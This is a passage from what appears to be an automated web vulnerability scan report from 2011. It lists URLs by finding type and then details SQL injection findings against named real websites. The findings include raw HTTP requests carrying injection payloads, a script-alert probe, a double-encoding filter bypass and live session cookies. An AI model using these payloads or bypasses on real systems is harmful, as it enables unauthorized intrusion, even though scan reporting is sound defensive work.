24.100. http://microsoftcambridge.com/Portals/0/teams/teamlogo_MNOIL.png

24.101. http://microsoftcambridge.com/Portals/0/teams/teamlogo_msftonlineserv.png

24.102. http://microsoftcambridge.com/Portals/0/teams/teams_header.png

24.103. http://microsoftcambridge.com/Portals/0/teams/teamsh2_MNIOL.png

24.104. http://microsoftcambridge.com/Portals/0/teams/teamsh2_msftonlineserv.png

24.105. http://microsoftcambridge.com/Portals/0/teams/tick.png

24.106. http://microsoftcambridge.com/Portals/0/teams/unifiedcom_inline.jpg

24.107. http://microsoftcambridge.com/Portals/0/teams/unifiedcomimg.jpg

24.108. http://microsoftcambridge.com/Portals/0/teams/unifiedcommunications.png

24.109. http://microsoftcambridge.com/favicon.ico

24.110. http://microsoftcambridge.com/images/help.gif

24.111. http://microsoftcambridge.com/images/spacer.gif

24.112. http://microsoftcambridge.com/img/bottom_back.png

24.113. http://microsoftcambridge.com/img/events/about.png

24.114. http://microsoftcambridge.com/img/events/about_ovr.png

24.115. http://microsoftcambridge.com/img/events/community.png

24.116. http://microsoftcambridge.com/img/events/community_ovr.png

24.117. http://microsoftcambridge.com/img/events/contact_us.png

24.118. http://microsoftcambridge.com/img/events/events.png

24.119. http://microsoftcambridge.com/img/events/featured_person.png

24.120. http://microsoftcambridge.com/img/events/header_back.png

24.121. http://microsoftcambridge.com/img/events/latest_feeds.png

24.122. http://microsoftcambridge.com/img/events/latest_tweet.png

24.123. http://microsoftcambridge.com/img/events/people.png

24.124. http://microsoftcambridge.com/img/events/people_ovr.png

24.125. http://microsoftcambridge.com/img/events/search.png

24.126. http://microsoftcambridge.com/img/events/share.png

24.127. http://microsoftcambridge.com/img/events/subscribe.png

24.128. http://microsoftcambridge.com/img/events/teams.png

24.129. http://microsoftcambridge.com/img/events/teams_ovr.png

24.130. http://microsoftcambridge.com/img/events/working.png

24.131. http://microsoftcambridge.com/img/events/working_ovr.png

24.132. http://microsoftcambridge.com/img/header_back.png

24.133. http://microsoftcambridge.com/img/home/about.png

24.134. http://microsoftcambridge.com/img/home/about_ovr.png

24.135. http://microsoftcambridge.com/img/home/community.png

24.136. http://microsoftcambridge.com/img/home/community_ovr.png

24.137. http://microsoftcambridge.com/img/home/contact_us.png

24.138. http://microsoftcambridge.com/img/home/events.png

24.139. http://microsoftcambridge.com/img/home/events_ovr.png

24.140. http://microsoftcambridge.com/img/home/footer_gallery.png

24.141. http://microsoftcambridge.com/img/home/latest_feeds.png

24.142. http://microsoftcambridge.com/img/home/latest_tweet.png

24.143. http://microsoftcambridge.com/img/home/people.png

24.144. http://microsoftcambridge.com/img/home/people_ovr.png

24.145. http://microsoftcambridge.com/img/home/search.png

24.146. http://microsoftcambridge.com/img/home/share.png

24.147. http://microsoftcambridge.com/img/home/subscribe.png

24.148. http://microsoftcambridge.com/img/home/teams.png

24.149. http://microsoftcambridge.com/img/home/teams_ovr.png

24.150. http://microsoftcambridge.com/img/home/working.png

24.151. http://microsoftcambridge.com/img/home/working_ovr.png

24.152. http://microsoftcambridge.com/img/microsoft-new-england-rdc.png

24.153. http://microsoftcambridge.com/img/microsoft_events_bg.jpg

24.154. http://microsoftcambridge.com/img/microsoft_home_bg.jpg

24.155. http://microsoftcambridge.com/img/microsoft_people_bg.jpg

24.156. http://microsoftcambridge.com/img/microsoft_teams_bg.jpg

24.157. http://microsoftcambridge.com/img/people/about.png

24.158. http://microsoftcambridge.com/img/people/about_ovr.png

24.159. http://microsoftcambridge.com/img/people/community.png

24.160. http://microsoftcambridge.com/img/people/community_ovr.png

24.161. http://microsoftcambridge.com/img/people/contact_us.png

24.162. http://microsoftcambridge.com/img/people/events.png

24.163. http://microsoftcambridge.com/img/people/events_ovr.png

24.164. http://microsoftcambridge.com/img/people/featured_team.png

24.165. http://microsoftcambridge.com/img/people/header_back.png

24.166. http://microsoftcambridge.com/img/people/latest_feeds.png

24.167. http://microsoftcambridge.com/img/people/latest_tweet.png

24.168. http://microsoftcambridge.com/img/people/people.png

24.169. http://microsoftcambridge.com/img/people/search.png

24.170. http://microsoftcambridge.com/img/people/share.png

24.171. http://microsoftcambridge.com/img/people/subscribe.png

24.172. http://microsoftcambridge.com/img/people/teams.png

24.173. http://microsoftcambridge.com/img/people/teams_ovr.png

24.174. http://microsoftcambridge.com/img/people/working.png

24.175. http://microsoftcambridge.com/img/people/working_ovr.png

24.176. http://microsoftcambridge.com/img/teams/about.png

24.177. http://microsoftcambridge.com/img/teams/about_ovr.png

24.178. http://microsoftcambridge.com/img/teams/community.png

24.179. http://microsoftcambridge.com/img/teams/community_ovr.png

24.180. http://microsoftcambridge.com/img/teams/contact_us.png

24.181. http://microsoftcambridge.com/img/teams/contentpane_back.png

24.182. http://microsoftcambridge.com/img/teams/events.png

24.183. http://microsoftcambridge.com/img/teams/events_ovr.png

24.184. http://microsoftcambridge.com/img/teams/featured_person.png

24.185. http://microsoftcambridge.com/img/teams/headerpane_back.png

24.186. http://microsoftcambridge.com/img/teams/latest_feeds.png

24.187. http://microsoftcambridge.com/img/teams/latest_tweet.png

24.188. http://microsoftcambridge.com/img/teams/people.png

24.189. http://microsoftcambridge.com/img/teams/people_ovr.png

24.190. http://microsoftcambridge.com/img/teams/search.png

24.191. http://microsoftcambridge.com/img/teams/share.png

24.192. http://microsoftcambridge.com/img/teams/subscribe.png

24.193. http://microsoftcambridge.com/img/teams/teams.png

24.194. http://microsoftcambridge.com/img/teams/working.png

24.195. http://microsoftcambridge.com/img/teams/working_ovr.png

24.196. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.197. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/HK9HyX1GgWJ.js

24.198. http://www.facebook.com/extern/login_status.php

24.199. http://www.facebook.com/extern/login_status.php

24.200. http://www.facebook.com/plugins/like.php

24.201. http://www.facebook.com/plugins/like.php

24.202. http://www.facebook.com/plugins/like.php

24.203. http://www.facebook.com/plugins/like.php

24.204. http://www.facebook.com/plugins/like.php

24.205. http://www.facebook.com/plugins/like.php

24.206. http://www.facebook.com/plugins/like.php

24.207. http://www.facebook.com/plugins/like.php

24.208. http://www.facebook.com/plugins/like.php

24.209. http://www.facebook.com/plugins/like.php

24.210. http://www.facebook.com/plugins/like.php

24.211. http://www.hbccards.com/SkinOverPlayStopSeekMuteVol.swf

24.212. http://www.hbccards.com/content_images/image/homepage_pic.jpg

24.213. http://www.hbccards.com/favicon.ico

24.214. http://www.hbccards.com/flash/sifr.swf

24.215. http://www.hbccards.com/flash_banner/player_V4.swf

24.216. http://www.hbccards.com/images/background.jpg

24.217. http://www.hbccards.com/images/box_bg1.jpg

24.218. http://www.hbccards.com/images/box_bg2.jpg

24.219. http://www.hbccards.com/images/box_bg3.jpg

24.220. http://www.hbccards.com/images/button_bg.jpg

24.221. http://www.hbccards.com/images/footer_bg.jpg

24.222. http://www.hbccards.com/images/hbc_logo.jpg

24.223. http://www.hbccards.com/images/icon_events.jpg

24.224. http://www.hbccards.com/images/icon_live_chat.jpg

24.225. http://www.hbccards.com/images/icon_newsletter.jpg

24.226. http://www.hbccards.com/images/nav_contact.jpg

24.227. http://www.hbccards.com/images/nav_contact_on.jpg

24.228. http://www.hbccards.com/images/nav_gc.jpg

24.229. http://www.hbccards.com/images/nav_gc_on.jpg

24.230. http://www.hbccards.com/images/nav_learnmore.jpg

24.231. http://www.hbccards.com/images/nav_learnmore_on.jpg

24.232. http://www.hbccards.com/images/nav_left_inside_bg.jpg

24.233. http://www.hbccards.com/images/nav_usegc.jpg

24.234. http://www.hbccards.com/images/nav_usegc_on.jpg

24.235. http://www.hbccards.com/images/nav_whyhbc.jpg

24.236. http://www.hbccards.com/images/nav_whyhbc_on.jpg

24.237. http://www.hbccards.com/images/poweredby.jpg

24.238. http://www.hbccards.com/images/sec_nav_bg.jpg

24.239. http://www.hbccards.com/images/spacer.jpg

24.240. http://www.hbccards.com/images/spacer2.jpg

25. Social security numbers disclosed

25.1. http://www.hbccards.com/

25.2. http://www.hbccards.com/ordernow.asp

26. Robots.txt file

26.1. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

26.2. http://api.search.live.net/json.aspx

26.3. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

26.4. http://atgincorporated.com/atgmenu_11.gif

26.5. http://b.scorecardresearch.com/r

26.6. http://clients1.google.com/complete/search

26.7. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255

26.8. http://googleads.g.doubleclick.net/pagead/ads

26.9. http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Dom_Ent/HuckinsYacht-Sound-Rect-300x250/huckins_0311.swf/1299012270

26.10. http://music.aol.com/_uac/adpage.html

26.11. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s83462371905334

26.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1161054613/Top/Dom_Ent/Google-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/72634857383031356952384144615a52

26.13. http://pagead2.googlesyndication.com/pagead/imgad

26.14. http://pixel.quantserve.com/pixel

26.15. http://portal.smartertools.com/ST.ashx

26.16. http://s0.2mdn.net/2450389/Capella_DR_standard_Online_Learn_728x90.swf

26.17. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_

26.18. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.19. https://secure.shareit.com/favicon.ico

26.20. http://segment-pixel.invitemedia.com/pixel

26.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.22. http://toolbarqueries.clients.google.com/tbproxy/af/query

26.23. http://tools.google.com/service/update2

26.24. http://www.citysbest.com/media/citysbest-min.css

26.25. http://www.cramerdev.com/weblog/

26.26. https://www.godaddy.com/

26.27. http://www.google-analytics.com/__utm.gif

26.28. http://www.google.com/uds/

26.29. http://www.googleadservices.com/pagead/conversion/1028748950/

26.30. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html%20%20

26.31. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

26.32. http://www.manitu.de/

26.33. http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf

26.34. https://www.plimus.com/jsp/buynow.jsp

26.35. http://www.smartertools.com/

26.36. http://www.soundingsonline.com/archives/'+NSFTW+'

26.37. http://www.sqlite.org/

26.38. https://www.supermedia.com/spportal/spportalFlow.do

26.39. http://www.superpages.com/inc/social/soc.php

26.40. https://www.territoryahead.com/jump.jsp

26.41. http://www.trustlogo.com/trustlogo/javascript/cot.js

27. Cacheable HTTPS response

27.1. https://a12.alphagodaddy.com/

27.2. https://feedback.discoverbing.com/default.aspx

27.3. https://feedback.discoverbing.com/jsinterface.aspx

27.4. https://secure.shareit.com/shareit/checkout.html

27.5. https://www.godaddy.com/gdshop/blank.htm

27.6. https://www.plimus.com/jsp/ajax/buynow_free_email_domain.jsp

27.7. https://www.plimus.com/jsp/buynow.jsp

27.8. https://www.plimus.com/jsp/buynow_analytics.jsp

27.9. https://www.supermedia.com/help

27.10. https://www.supermedia.com/help/direct-mail

27.11. https://www.supermedia.com/help/domains-email

27.12. https://www.supermedia.com/help/local-search-marketing

27.13. https://www.supermedia.com/help/web-site-design

27.14. https://www.supermedia.com/spportal/404.jsp

27.15. https://www2.hbc.com/contactus/contact-us.asp

28. Multiple content types specified

29. HTML does not specify charset

29.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

29.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

29.3. http://ad.doubleclick.net/adi/huffpost.politics/news

29.4. http://atgincorporated.com/atgmenu_11.gif

29.5. http://atgincorporated.com/images/atgmenu_11_hover.gif

29.6. http://atgincorporated.com/images/atgmenu_12_hover.gif

29.7. http://atgincorporated.com/images/atgmenu_13_hover.gif

29.8. http://atgincorporated.com/images/atgmenu_14_hover.gif

29.9. http://atgincorporated.com/images/atgmenu_15_hover.gif

29.10. http://atgincorporated.com/images/atgmenu_17_hover.gif

29.11. http://atgincorporated.com/qmimages/gradient_11.gif

29.12. http://bidder.mathtag.com/iframe/notify

29.13. http://cloudscan.org/VaUcX/welcome.html

29.14. http://cloudscan.org/favicon.ico

29.15. http://cloudscan.org/welcome.html

29.16. http://hbc.com/

29.17. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

29.18. http://image3.pubmatic.com/AdServer/UPug

29.19. http://js.adsonar.com/js/pass.html

29.20. http://music.aol.com/_uac/adpage.html

29.21. http://music.aol.com/proxy/promo/

29.22. http://my-happyfeet.com/images/about2.gif

29.23. http://my-happyfeet.com/images/faq2.gif

29.24. http://my-happyfeet.com/undefined

29.25. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

29.26. http://www.aamraresources.com/

29.27. http://www.bluestarfibres.com/favicon.ico

29.28. http://www.fast-report.com/bitrix/redirect3.php

29.29. https://www.godaddy.com/sso/keepalive.aspx

29.30. http://www.manitu.de/webhosting/header/

29.31. http://www.manitu.de/webhosting/home/

29.32. http://www.manitu.de/webhosting/nav/

29.33. http://www.manitu.de/webhosting/status/

29.34. http://www.manitu.de/webhosting/subnav/

29.35. http://www.my-happyfeet.com/images/about2.gif

29.36. http://www.my-happyfeet.com/images/faq2.gif

29.37. http://www.nutter.com/careers.ph

29.38. http://www.nutter.com/careers.php

29.39. http://www.nutter.com/media/swf/media/industries/media.212.jpg

29.40. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

29.41. http://www.paperg.com/jsfb/embed.php

30. HTML uses unrecognised charset

30.1. http://www.fast-report.com/bitrix/redirect2.php

30.2. http://www.fast-report.com/en/buy/

30.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

30.4. http://www.fast-report.com/en/download/fastreport.net-download.html

30.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

30.6. http://www.fast-report.com/en/products/

30.7. http://www.fast-report.com/en/products/FastReport.Net.html

31. Content type incorrectly stated

31.1. http://a.rad.msn.com/ADSAdClient31.dll

31.2. http://a12.alphagodaddy.com/

31.3. https://a12.alphagodaddy.com/

31.4. http://blogs.technet.com/analyticsid.aspx

31.5. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

31.6. https://feedback.discoverbing.com/jsinterface.aspx

31.7. http://image3.pubmatic.com/AdServer/UPug

31.8. http://maps.slapi0.virtualearth.net/EntityDetails.ashx

31.9. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

31.10. http://microsoftcambridge.com/favicon.ico

31.11. http://microsoftcambridge.com/slideshow/Vertigo.small.xap

31.12. http://o.aolcdn.com/os_merge/

31.13. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

31.14. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

31.15. http://portalblog.aol.com/media/background_new.gif

31.16. http://rad.msn.com/ADSAdClient31.dll

31.17. http://sales.liveperson.net/hcp/html/mTag.js

31.18. http://sc1.maps.live.com/i/bin/20110317.509/action_item_bullet.gif

31.19. http://technet.microsoft.com/clientaccesspolicy.xml

31.20. http://technet.microsoft.com/en-us/library/bb126093(n).aspx

31.21. http://technet.microsoft.com/en-us/library/bb905490(n).aspx

31.22. http://technet.microsoft.com/en-us/library/cc440494(n).aspx

31.23. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

31.24. http://www.aol.com/ajax.jsp

31.25. https://www.godaddy.com/sso/keepalive.aspx

31.26. http://www.huffingtonpost.com/badge/badges_json_v2.php

31.27. http://www.insideup.com/ppc/leadflow/hins00/project.php

31.28. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

31.29. http://www.manitu.de/webhosting/home/images/homepagekosten-verfuegbarkeit.gif

31.30. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

31.31. http://www.paperg.com/jsfb/embed.php

31.32. http://www.trafficland.com/bing/data.cry

32. SSL certificate

32.1. https://secure.avangate.com/

32.2. https://secure.shareit.com/

32.3. https://www.godaddy.com/

32.4. https://www.plimus.com/

32.5. https://www.supermedia.com/

32.6. https://www.territoryahead.com/

32.7. https://www2.hbc.com/


1. SQL injection  next
There are 28 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d1--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 1 697 -->
       
       
       
           
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET",
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d2--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0 697 -->
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET", url, false);
       r
...[SNIP]...
1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /shavlik/index.cfm?m=1009'&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f9062&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 20:42:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...
1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xml/jasmin/get/110325-1413%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413%2527%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=
